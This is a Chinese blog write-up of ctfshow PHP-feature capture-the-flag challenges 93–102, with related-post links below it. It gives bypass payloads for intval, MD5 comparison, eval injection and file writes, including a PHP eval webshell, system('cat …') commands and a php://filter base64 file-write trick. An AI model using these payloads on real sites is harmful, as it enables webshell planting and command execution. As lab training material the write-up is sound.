php特性刷题

最新推荐文章于 2024-09-27 16:14:02 发布
最新推荐文章于 2024-09-27 16:14:02 发布
阅读量813 收藏 15
点赞数 21
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_77961060/article/details/141533889
版权

93

上面注释的是一些配置信息

然后包含flag.php页面

高亮显示

如果,先判断是否存在GET传参的参数num,如果弱比较等于4476,就会输出“no non no !”

如果包含字母那么就错误(包含大小写)

判断变量 $num 是否等于 4476,如果是,则输出变量 $flag 的值;否则,输出变量 $num 转换为整数后的值。

需要num的值等于4476,但又弱比较不可以,就是说可以转换进制,数值相同就行,因为不能用英文,所以16进制和32进制都不行,这是它的2,4,8进制

1000101111100

1011330

10574

可以看到intval函数的语法,要在前面加上0x或0

尝试传参?num=010574

94

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==="4476"){
        die("no no no!");
    }
    if(preg_match("/[a-z]/i", $num)){
        die("no no no!");
    }
    if(!strpos($num, "0")){ // 在这个地方需要返回的值不能为0,也就是说0不能在第一位
        die("no no no!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

所以?num=4476.0

95

include("flag.php");
highlight_file(__FILE__);
if(isset($_GET['num'])){
    $num = $_GET['num'];
    if($num==4476){
        die("no no no!");
    }
    if(preg_match("/[a-z]|\./i", $num)){// 点匹配没了
        die("no no no!!");
    }
    if(!strpos($num, "0")){
        die("no no no!!!");
    }
    if(intval($num,0)===4476){
        echo $flag;
    }
}

利用八进制开头加号代替空格绕过?num=+010574

96

highlight_file(__FILE__);

if(isset($_GET['u'])){
    if($_GET['u']=='flag.php'){
        die("no no no");
    }else{
        highlight_file($_GET['u']);
    }
}

payload

./flag.php
/var/www/html/flag.php
php://filter/resource=flag.php

 97

include("flag.php");
highlight_file(__FILE__);
if (isset($_POST['a']) and isset($_POST['b'])) {
if ($_POST['a'] != $_POST['b'])
if (md5($_POST['a']) === md5($_POST['b']))
echo $flag;
else
print 'Wrong.';
}
?>

md5弱类型比较可以直接数组绕过,其结果都会转换为null

a[]=1&b[]=2

 

如果进行了string强制转类型后,则不再接受数组

弱碰撞:

$a=(string)$a;
$b=(string)$b;
if(  ($a!==$b) && (md5($a)==md5($b)) ){
echo $flag;
}
md5弱比较,为0e开头的会被识别为科学记数法,结果均为0,所以只需找两个md5后都为0e开头且0e后面均为数字的值即可。
payload: a=QNKCDZO&b=240610708

强碰撞:

$a=(string)$a;
$b=(string)$b;
if(  ($a!==$b) && (md5($a)===md5($b)) ){
echo $flag;
}
这时候需要找到两个真正的md5值相同数据

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

98

<?php

include("flag.php");
$_GET?$_GET=&$_POST:'flag';
$_GET['flag']=='flag'?$_GET=&$_COOKIE:'flag';
$_GET['flag']=='flag'?$_GET=&$_SERVER:'flag';
highlight_file($_GET['HTTP_FLAG']=='flag'?$flag:__FILE__);

?>
 

既然get传入的值会被定位指向到post所对应的值,那么只需要有get存在即可,同时post传入HTTP_FLAG=flag就可以了

99

highlight_file(__FILE__);
$allow = array();
for ($i=36; $i < 0x36d; $i++) {
    array_push($allow, rand(1,$i));
}
if(isset($_GET['n']) && in_array($_GET['n'], $allow)){
    file_put_contents($_GET['n'], $_POST['content']);
}

?>

array_push() 函数:向数组尾部插入一个或多个元素

rand() 函数随机生成数组rand(min,max)

file_put_contents() 函数:写入函数

payload:

?n=5.php
content=<?php @eval($_POST['hack']);?>
content=<?php system('cat flag36d.php');?>

100

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\;/", $v2)){
        if(preg_match("/\;/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }    
}
?>

php中OR与|| AND与&&的区别总结

因为赋值的优先级(=)高于and所以 v 0 的 值 可 以 由 v0的值可以由 v0的值可以由v1来控制,所以我们需要给其赋值为1也就是true

因为flag在类ctfshow中,所以可以直接命令执行

?v1=1&v2=var_dump($ctfshow)&v3=;
v1=1&v2=system("cat ctfshow.php")/*&v3=*/;

101

highlight_file(__FILE__);
include("ctfshow.php");
//flag in class ctfshow;
$ctfshow = new ctfshow();
$v1=$_GET['v1'];
$v2=$_GET['v2'];
$v3=$_GET['v3'];
$v0=is_numeric($v1) and is_numeric($v2) and is_numeric($v3);
if($v0){
    if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\)|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\;|\?|[0-9]/", $v2)){
        if(!preg_match("/\\\\|\/|\~|\`|\!|\@|\#|\\$|\%|\^|\*|\(|\-|\_|\+|\=|\{|\[|\"|\'|\,|\.|\?|[0-9]/", $v3)){
            eval("$v2('ctfshow')$v3");
        }
    }
    
}

?>

这里牵扯到的是一个反射类的问题

php反射类 ReflectionClass使用例子

PHP的反射类ReflectionClass、ReflectionMethod使用实例

反射在 PHP 中的应用

看了半天,大概知道了

反射类可以说成是类的一个映射,可以利用反射类来代替有关类的应用的任何语句

其属性为类的一个名称,这道题目里面类的名称为ctfshow

payload:?v1=1&v2=echo new ReflectionClass&v3=;

举个例子

<?php
class hacker{
    public $hackername = "yn8rt";
    const  yn8rt='nb666';
    public  function show(){
    echo $this->name,'<br>';
    }
}
//有这么一个hacker类,假设我们不知道这个类是干什么用的,我们需要知道类里面的信息,这时候就需要用到ReflectionClass来对类进行反射
//现在我可以通过反射来获取这个类中的方法,属性,常量

//通过反射获取类的信息

$reflection = new ReflectionClass('hacker');//实例化反射对象,映射hacker类的信息
$consts = $reflection->getConstants();//获取所有常量
$props = $reflection->getProperties();//获取所有属性
$methods = $reflection->getMethods();//获取所有方法
var_dump($consts);
var_dump($props);
var_dump($methods);
?>

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21

返回值

array(1) {
  ["yn8rt"]=>
  string(5) "nb666"
}
array(1) {
  [0]=>
  &object(ReflectionProperty)#2 (2) {
    ["name"]=>
    string(10) "hackername"
    ["class"]=>
    string(6) "hacker"
  }
}
array(1) {
  [0]=>
  &object(ReflectionMethod)#3 (2) {
    ["name"]=>
    string(4) "show"
    ["class"]=>
    string(6) "hacker"
  }
}

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22

如果没有指定方法的话,就会像题目中默认输出很多东西:

1.常量 Contants
2.属性 Property Names
3.方法 Method Names静态
4.属性 Static Properties
5.命名空间 Namespace
6.Person类是否为final或者abstract
7.Person类是否有某个方法

102

highlight_file(__FILE__);
$v1 = $_POST['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
$v4 = is_numeric($v2) and is_numeric($v3);
if($v4){
    $s = substr($v2,2);// 这里的意思是从第二位开始截取
    $str = call_user_func($v1,$s);// 回调函数,第一个参数为调用的函数,其余的为调用参数的值
    echo $str;
    file_put_contents($v3,$str);
}
else{
    die('hacker');
}


?>

利用base64,同时配合伪协议去写入,但是需要保证通过is_number函数的判断,可以有字母啊,但是必得是e啊,也就是科学计数法啊,来自同一家的payload啊:

$a='<?=`cat *`;';
$b=base64_encode($a);  // PD89YGNhdCAqYDs=
$c=bin2hex($b);      //这里直接用去掉=的base64
输出   5044383959474e6864434171594473

?v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64-decode/resource=1.php

post:v1=hex2bin

然后访问1.php去触发就可以了

小丑皇,王中王
关注
【Web】CTFSHOW PHP特性刷题记录(全)
uuzeray的博客
01-14 1451
知其然知其所以然,尽量把每种特性都详细讲明白。
php部分特性漏洞学习
oyf3085227433的博客
05-22 3328
简要总结一下最近遇到的一些的关于php特性的知识点
CTFshow刷题日记-WEB-PHP特性(下篇123-150)
Love&Share
09-05 3371
web123,125,126 error_reporting(0); highlight_file(__FILE__); include("flag.php"); $a=$_SERVER['argv']; $c=$_POST['fun']; if(isset($_POST['CTF_SHOW'])&&isset($_POST['CTF_SHOW.COM'])&&!isset($_GET['fl0g'])){ if(!preg_match("/\\\\|\/|\~|\`
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3518
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
刷题日记 date 6.8
m0_64348326的博客
06-08 278
1.总体来看这题还是不简单的,最难的部分是如何构造函数并返回命令执行的结果。这题用了回调+箭头函数的形式来构造payload,理解起来还是很难的。2.光这道题就花了很久的时间,剩下的就没怎么看了。
基于php的在线刷题系统的设计和实现(源码+LW+调试文档)
全网粉丝10W+、全栈领域优质创作者、阿里云等社区博客专家、专注于全栈领域和毕业项目实战
09-13 615
Java的主要特点是简单性、面向对象、分布式、健壮性、安全性和可移植性。Java的设计初衷是让程序员能够以优雅的方式编写复杂的程序。它支持 Internet 应用的开发,并内建了网络应用编程接口,极大地便利了网络应用的开发。同时,Java的强类型机制和异常处理功能确保了程序的健壮性。Java分为三个主要版本:Java SE(标准版),主要用于桌面应用程序开发;Java EE(企业版),用于开发企业级应用;Java ME(微型版),专门用于嵌入式系统和移动设备应用开发
BUU刷题记4
Kanyun的博客
07-23 863
在无回显的情况下,选择报错注入----updatexml()原因格式简单😂在GET传参时注意'#-->%23sql中的right()函数,可从右显示字段值一句话木马绕过
BUU刷题记1
Kanyun的博客
07-22 849
ps参数顺序要注意,ba换位ab,flag会被检测出来)ctfping命令执行这一题好像在前端就进行了文件格式过滤,猜测在js中进行判断,尝试寻找js----->失败只能BP抓包修改后缀类型了判断注入点后,常规查询,发现部分关键字被绕过。...
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2295
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
程序员5个刷题网站-dts:ACFUN大逃杀ACFUNBattleRoyale,PHP多人网页游戏,代码重构
07-07
程序员5个刷题网站 常磐大逃杀 N.E.W.版 一个基于php、以文本形式为主、多人即时混战类的webgame。 游戏特性 即开即玩,易于上手 + 战术复杂,难于精通 源于大逃杀原作的1 VS N混战精神 多样化的求胜路径和策略 令人...
php-leetcode题解之柠檬水找零.zip
06-10
在这个解法中,我们利用了回溯法的“剪枝”特性,即在发现当前路径无法满足条件时,及时回退,避免无效的计算。同时,通过引用传递change数组,我们能够在递归过程中记录当前的硬币组合状态。 总的来说,“柠檬水...
谷歌师兄的leetcode刷题笔记-TheCartPress:WordPress电子商务插件
06-30
6. **PHP编程**:作为WordPress插件,TheCartPress的开发主要基于PHP,因此可能涉及PHP语言的基础和高级特性,以及WordPress的API接口使用。 7. **前端技术**:可能涉及到HTML、CSS和JavaScript,用于创建用户界面...
buuctf刷题
qq_41788704的博客
10-28 2002
buuctf刷题BJDCTF2020 Easy MD5网鼎杯 2020 青龙组 AreUSerialzGYCTF2020 Blacklist强网杯 2019 随便注 BJDCTF2020 Easy MD5 进来就是一个输入框,发包查看返回信息 可以看到SQL语句。这里猜想MD5出来的值会不会可以可以这样利用 select * from ‘admin’ where password=’‘or’1’ 这段PHP代码可以找到MD5出来的值类似于 '‘or’1…’ <?php for ($i = 0;;)
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
软希网分享源码的博客
09-23 508
2024PHP彩虹工具网源码一个多功能工具箱程序支持72种常用站长和开发等工具
服务器被挂马,导致网站首页被更改怎么解决
最新发布
KookeeyLena7的博客
09-27 679
当服务器被挂马并导致网站首页被篡改时,说明服务器或网站的安全性遭到破坏。
PHP中error_reporting函数作用
sheji888的专栏
09-24 778
除了使用PHP内置的错误处理机制外,你还可以使用函数来定义自己的错误处理函数。这允许你更灵活地控制错误报告的行为,例如,将错误信息发送到外部系统或显示自定义的错误页面。
web平台搭建-LAMP(CentOS-7)
gsdgdg00的博客
09-24 697
一. 准备工作环境要求:操作系统:CentOS 7.X 64位网络配置:nmtui字符终端图形管理工具或者直接编辑配置文件关闭SELinux和firewalld防火墙防火墙:临时关闭:systemctl stop firewalld永久关闭:systemctl disable firewalld。
php中打印函数
09-24 359
PHP中,打印函数主要用于输出或显示数据。常用的打印函数包括:
PHP5.3到7版本新增特性详解
"php5.3/5.4/5.5/5.6/7常见新增特性汇总整理" PHP从5.3版本开始到7.0版本,经历了一系列的重大更新和改进,引入了许多新的特性,提高了性能和开发效率。以下是对这些版本中常见新增特性的详细说明: 1. **?:简化的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值